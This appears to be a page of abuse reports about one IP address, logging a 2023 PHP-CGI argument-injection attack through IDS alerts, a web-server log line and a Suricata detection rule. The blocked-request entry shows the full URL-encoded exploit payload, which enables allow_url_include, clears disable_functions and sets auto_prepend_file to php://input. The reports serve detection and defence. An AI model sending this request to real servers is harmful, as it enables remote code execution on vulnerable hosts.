[1:2016977:5] ET WEB_SERVER allow_url_include PHP config option in uri [**] [Classification: A Netwo ... show more[1:2016977:5] ET WEB_SERVER allow_url_include PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443
[1:2016978:5] ET WEB_SERVER safe_mode PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443
[1:2016979:6] ET WEB_SERVER suhosin.simulation PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443
[1:2016980:7] ET WEB_SERVER disable_functions PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443
[1:2016981:6] ET WEB_SERVER open_basedir PHP config option in uri [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 185.225.75.21:57190 -> x.x.x.x:443 show less
185.225.75.21 -h (38337-NIU Telecommunications Inc United States -) - - [08/Aug/2023:06:05:01 +0200] ... show more185.225.75.21 -h (38337-NIU Telecommunications Inc United States -) - - [08/Aug/2023:06:05:01 +0200] "POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%
... show less
[SID: 31922] Web Attack: Malicious Payload Upload 12 attack blocked. Traffic has been blocked for th ... show more[SID: 31922] Web Attack: Malicious Payload Upload 12 attack blocked. Traffic has been blocked for this application: SYSTEM
URL: http://-h//%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e show less
HackingWeb App Attack
Anonymous
The following intrusion was observed: PHP.CGI.Argument.Injection.
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER disable_functions PHP config o ... show morealert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER disable_functions PHP config option in uri"; flow:established,to_server; http.uri; content:"disable_functions"; fast_pattern; pcre:"/\bdisable_functions[\s\+]*?=/"; reference:url,seclists.org/fulldisclosure/2013/Jun/21; classtype:trojan-activity; sid:2016980; rev:7; metadata:created_at 2013_06_06, updated_at 2020_09_18;) show less